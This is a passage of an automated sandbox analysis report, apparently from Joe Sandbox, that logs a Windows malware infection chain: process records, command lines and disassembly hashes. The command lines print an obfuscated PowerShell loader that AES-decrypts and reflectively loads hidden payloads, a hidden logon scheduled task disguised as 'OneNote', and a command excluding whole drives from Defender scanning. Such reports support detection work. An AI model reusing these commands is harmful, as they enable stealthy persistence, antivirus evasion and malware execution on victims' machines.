                                      Start time:14:10:33
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:14:10:33
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:14:10:39
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:14:10:39
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:14:10:45
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:14:10:45
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:20
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:21
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:23
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:14:10:51
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:14:10:51
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:14:10:58
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:14:10:58
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:14:11:09
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:14:11:09
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 036629F0 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10d7d4bc48e138ee20e93fd72dd88094fb9c148c205ceedd614bf907eef02bb5
                                        • Instruction ID: 75c883e3fef4aa73858f4ad4e7cd399d53d7bf897567cd786395bdd6a8fae0e3
                                        • Opcode Fuzzy Hash: 10d7d4bc48e138ee20e93fd72dd88094fb9c148c205ceedd614bf907eef02bb5
                                        • Instruction Fuzzy Hash: D7A18F70A002099FCB15CF5DC9949AEFBB1FF89350B248AA9D815AB365C736FC51CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03662B00 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c83a1af4e5192ff8df7357e292b3882060d9f3918a574338b4a34b31b572760
                                        • Instruction ID: bffe8a2c3e0baf18bc145d28f0429b16195b681dc1e856a640bd7ebd6d5eab9c
                                        • Opcode Fuzzy Hash: 1c83a1af4e5192ff8df7357e292b3882060d9f3918a574338b4a34b31b572760
                                        • Instruction Fuzzy Hash: 2B4137B4A006099FCB09CF58C5A8DAAFBB1FF48354B258599D815AB364C736FC51CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 036630E0 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7fdcbc47069e917d9ac8fdd2daf60d05ec29972b619506abcf5375cb80106e0f
                                        • Instruction ID: 0bf561947953f2b36f0abdf1b64b1b7668d6ebed11ab846c2aa172e53d7941a0
                                        • Opcode Fuzzy Hash: 7fdcbc47069e917d9ac8fdd2daf60d05ec29972b619506abcf5375cb80106e0f
                                        • Instruction Fuzzy Hash: 70317A74A042499FCB01DF5CC9909AAFBF1FF49310B2581AAD849EB362C735EC45CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03663110 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bdf3e5c3ccdbcaafc4377153b34ed36bc49d5a61552a4c3faf650e3db1e054b
                                        • Instruction ID: e16c45491a81419e7179fd1f8291dc4ace691cbd4746d37be9f12055f6ca8ccf
                                        • Opcode Fuzzy Hash: 9bdf3e5c3ccdbcaafc4377153b34ed36bc49d5a61552a4c3faf650e3db1e054b
                                        • Instruction Fuzzy Hash: 2E212AB4A002099FCB04CF5DC9909AAFBB1FF49310B258599E819EB365C735EC41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035FD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670383910.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_35fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ca34129eead52205ba4c7fd540173439b656fdf427ec2a9f833bf86880cd1fc
                                        • Instruction ID: a282ff2164b56361ea7ebf1a7c18282e1dd749612182885830905f2eff74580e
                                        • Opcode Fuzzy Hash: 2ca34129eead52205ba4c7fd540173439b656fdf427ec2a9f833bf86880cd1fc
                                        • Instruction Fuzzy Hash: D401F731008300AFE710CA26E984767FFECFF41324F0CC96AEE084B15AD2799841C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035FD006 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670383910.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_35fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2dbbfbfd2075c9318fcdfdec7cf849b982be52c09c18004be663cec76cc7c884
                                        • Instruction ID: 278d87a35dd1acfe3a587090ec52b434f24ba4f7d1f2b941d0bbce84fc365b39
                                        • Opcode Fuzzy Hash: 2dbbfbfd2075c9318fcdfdec7cf849b982be52c09c18004be663cec76cc7c884
                                        • Instruction Fuzzy Hash: CD01407100E3C09FD7128B25D894B56BFB8EF43224F1D84DBD9888F1A7C2699849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 0447B49B Relevance: 6.5, Strings: 5, Instructions: 253COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: c394dc7b2f9865c0c82101df43ea8b99deb99c1c5e5479f207238ebabc93981f
                                        • Instruction ID: 1496692e91c62c679df197e8115259e86967cacbaf5629b80453dd7d89aefb31
                                        • Opcode Fuzzy Hash: c394dc7b2f9865c0c82101df43ea8b99deb99c1c5e5479f207238ebabc93981f
                                        • Instruction Fuzzy Hash: 119177B1B006595BDB5AEFB4C8156AEB7E2EF84704B00891DD50AAB340DF746E0A8BC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447B4A0 Relevance: 6.5, Strings: 5, Instructions: 252COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: 1fdceaa6ead1005bc36b00ea3ae2724a3bde3e74489dadae24e8fa7b5f28fc80
                                        • Instruction ID: 9b3c8a2730e0eeb002aaef9efdb6af7fea531725dc7b3aaa5a8bc9ec75535b14
                                        • Opcode Fuzzy Hash: 1fdceaa6ead1005bc36b00ea3ae2724a3bde3e74489dadae24e8fa7b5f28fc80
                                        • Instruction Fuzzy Hash: 5A9176B1B007595BDB5AEFB4C8156AEB7E2EF84704B00891DD50ABB340DF746E0A8BC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447B490 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: b075fdf465e482cad5c6325dce35dae51419236ef7d560f6e27ad28af158c86f
                                        • Instruction ID: 959f7bf75fac6ebe3735980d7e7fff035510bda8ec3468ae46e6015575ad167b
                                        • Opcode Fuzzy Hash: b075fdf465e482cad5c6325dce35dae51419236ef7d560f6e27ad28af158c86f
                                        • Instruction Fuzzy Hash: 778179B1B007595BDB1AEFB4C8155AEB7E2EF84704B00891DD51AAB340DF746E0B8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E2308 Relevance: 36.6, Strings: 28, Instructions: 1591COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$p5rk$piJk$piJk$piJk$piJk$piJk$tP^q$tP^q$tP^q$tP^q$tP^q$tP^q$|,Lk$#rk$$^q$$^q$$^q$$rk$xl$xl
                                        • API String ID: 0-877694843
                                        • Opcode ID: d46abdc8ec624e52b946e5f2f9b870a0ee31930a1b36f515366994073da36cbc
                                        • Instruction ID: 10dd32f2fe2fd71d1f834d2fd23c822e43ffbe126fbca1669d65dda933447486
                                        • Opcode Fuzzy Hash: d46abdc8ec624e52b946e5f2f9b870a0ee31930a1b36f515366994073da36cbc
                                        • Instruction Fuzzy Hash: ABB278B1B003069FCB659B78890566ABFEEBFC6310F1486BAD455CB351DB31C885C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E3CE8 Relevance: 5.6, Strings: 4, Instructions: 592COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-1420252700
                                        • Opcode ID: fdee32f10418164741e571ae85cf43e7b714a797cf3beeb72188d9c599655168
                                        • Instruction ID: d70f9066f19763023978b73e96b7598b3637e95938b0681e8bd18fced238b9ff
                                        • Opcode Fuzzy Hash: fdee32f10418164741e571ae85cf43e7b714a797cf3beeb72188d9c599655168
                                        • Instruction Fuzzy Hash: F21257B1B042568FCB658A78990166BBFEAAFC1310F1486BAF515CB351DB32CC85C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04476FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: ee6663aeeddf922da29601914b4a82375bf7c22ecddf89563a4bfdbb9367e51f
                                        • Instruction ID: b07dd154dc1ec53051316ead0d53d313770f6bc133149a313b102ed5fcfccd77
                                        • Opcode Fuzzy Hash: ee6663aeeddf922da29601914b4a82375bf7c22ecddf89563a4bfdbb9367e51f
                                        • Instruction Fuzzy Hash: A5412D34B042458FCB15DFA9C864AAEBBF1EF8D711F5544A9E406AB391DB31ED02CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E763 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: piJk
                                        • API String ID: 0-3716911216
                                        • Opcode ID: f6ea09e076c14b4eb16da184af7285e3304d08910852ea232289a9e047e70554
                                        • Instruction ID: 1fec1cb3c76e9a87ac338605bbe17c0075afa917a5282a5527848e46e8ea9a37
                                        • Opcode Fuzzy Hash: f6ea09e076c14b4eb16da184af7285e3304d08910852ea232289a9e047e70554
                                        • Instruction Fuzzy Hash: 30314D70A00605DFCB14DF79D994A9EBBF1FF48340F108669D419A73A4DB34AD49CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E768 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: piJk
                                        • API String ID: 0-3716911216
                                        • Opcode ID: f69d2f99194a69c59ab7e91cfa2febbca2b88ba4688962c5931c9b05fda38a6b
                                        • Instruction ID: 829a2942fc96f5dcda09aa72893e8995e45829518d5f8d82dcff748a8e29ef8d
                                        • Opcode Fuzzy Hash: f69d2f99194a69c59ab7e91cfa2febbca2b88ba4688962c5931c9b05fda38a6b
                                        • Instruction Fuzzy Hash: 32316E70A00605DFCB14DF79D994A9EBBF2FF88340F108669D419A73A4DB34AD49CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AFA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: 01ec5637b7bc95e8036f5db7b3c16ee83fcb75fdf1004b280d5f1b387dba2077
                                        • Instruction ID: 87bbfc1a4652d092cb32f6a6f7eaf6cc9f8da830dd0d4e197b6efe006495fa82
                                        • Opcode Fuzzy Hash: 01ec5637b7bc95e8036f5db7b3c16ee83fcb75fdf1004b280d5f1b387dba2077
                                        • Instruction Fuzzy Hash: BE21F172A002588FCB14DFAED4407DFBBF5EB88320F14842AD418E7300CB75A9068FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E8E0 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f156800d4045de4b93daef29f8c3b40e1314b44011b01ae0e3c7f739574f86c6
                                        • Instruction ID: 4de54a046a86abb978f29b3f643ff4546939455bd8bbafe65252eb267670d82e
                                        • Opcode Fuzzy Hash: f156800d4045de4b93daef29f8c3b40e1314b44011b01ae0e3c7f739574f86c6
                                        • Instruction Fuzzy Hash: 4D918F75B002158FCB24DF78C5545AEBBE6AF88700F2445AAE806EB364DF75EC42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 044729F0 Relevance: .2, Instructions: 210COMMON
                                        Download Yara Rule
                                        Memory Dump Source
